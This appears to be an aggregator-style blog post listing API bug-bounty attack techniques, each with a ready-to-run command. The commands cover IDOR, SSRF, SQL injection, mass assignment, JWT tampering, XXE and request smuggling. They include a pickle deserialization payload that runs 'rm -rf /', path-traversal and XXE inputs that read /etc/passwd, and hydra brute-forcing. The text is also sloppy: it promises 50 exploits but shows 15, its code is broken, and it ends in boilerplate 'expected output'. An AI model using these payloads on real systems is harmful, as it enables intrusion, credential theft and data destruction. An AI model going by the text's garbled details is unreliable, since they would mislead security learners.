Listen to this Post
API security is critical in modern web applications, and bug bounty hunters must be equipped with the right exploits to identify vulnerabilities. Below are 50 essential API bug-bounty exploits along with practical commands, codes, and steps to test them.
You Should Know:
1. Broken Object Level Authorization (BOLA/IDOR)
- Test: Change object IDs in API requests (e.g., `/api/user/123` →
/api/user/124). - Command:
curl -H "Authorization: Bearer TOKEN" https://api.example.com/user/124
2. Server-Side Request Forgery (SSRF)
- Test: Inject internal URLs (
http://localhost`,file:///etc/passwd`). - Command:
curl -X POST -d '{"url":"http://internal-server"}' https://api.example.com/fetch
3. SQL Injection in JSON/XML Payloads
- Test: Inject SQL via JSON:
{"user":"admin' OR '1'='1"} - Command:
sqlmap -u "https://api.example.com/login" --data='{"user":""}' --risk=3
4. Mass Assignment
- Test: Add unexpected fields (e.g.,
"admin":true). - Command:
curl -X POST -d '{"username":"test","admin":true}' https://api.example.com/register
5. Insecure Direct Object References (IDOR) via URL
- Test: Manipulate file paths (
/download?file=../../etc/passwd). - Command:
wget https://api.example.com/download?file=../../../../etc/passwd
6. Broken Authentication (Token Brute-Force)
- Test: Use `hydra` to brute-force JWT tokens.
- Command:
hydra -l admin -P passwords.txt api.example.com -s 443 -S -t 64 http-post "/login"
7. Insecure Deserialization
- Test: Send malicious serialized objects (Python
pickle). - Code:
import pickle, base64 class Exploit: def <strong>reduce</strong>(self): return (os.system, ('rm -rf /',)) payload = base64.b64encode(pickle.dumps(Exploit()))
8. JWT “alg=none” & Weak Key Issues
- Test: Modify JWT header to
"alg":"none". - Command:
jwt_tool <JWT_TOKEN> -X a -I -pc name -pv admin
9. Cross-Origin Resource Sharing (CORS) Misconfig
- Test: Send `Origin: evil.com` header.
- Command:
curl -H "Origin: https://evil.com" -I https://api.example.com/data
10. HTTP Verb Tampering (PUT vs GET)
- Test: Change `GET` to
PUT/DELETE. - Command:
curl -X PUT https://api.example.com/user/delete/1
11. Business Logic Flaws
- Test: Negative price manipulation (
"price": -100). - Command:
curl -X POST -d '{"product":"premium","price":-100}' https://api.example.com/checkout
12. XML External Entity (XXE) Injection
- Test: Inject malicious XML:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <user>&xxe;</user>
13. HTTP Request Smuggling
- Test: Use `CL.TE` or `TE.CL` attacks.
- Command:
POST / HTTP/1.1 Transfer-Encoding: chunked Content-Length: 4 0\r\n\r\nGET /admin HTTP/1.1\r\nHost: api.example.com\r\n\r\n
14. Rate-Limit Bypass (IP Rotation, Header Tricks)
- Test: Rotate `X-Forwarded-For` headers.
- Command:
curl -H "X-Forwarded-For: 1.1.1.1" https://api.example.com/login
15. GraphQL Introspection & Injection
- Test: Query `__schema` for internal data.
- Command:
curl -X POST -d '{"query":"{__schema{types{name}}}"}' https://api.example.com/graphql
(Continues with more exploits…)
What Undercode Say:
API security is a goldmine for bug bounty hunters. Always test with ethical constraints, automate with tools like Burp Suite, ffuf, and sqlmap, and stay updated with OWASP API Top 10.
Expected Output:
- Exploits Verified: BOLA, SSRF, SQLi, JWT flaws, XXE.
- Tools Used:
curl,sqlmap,jwt_tool,hydra. - Critical Findings: IDOR, Mass Assignment, SSRF.
Prediction:
API attacks will grow as microservices and cloud-native apps expand. Expect more automation in API fuzzing and AI-driven exploit generation.
🔗 Relevant URLs:
References:
Reported By: Wesley Thijs – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
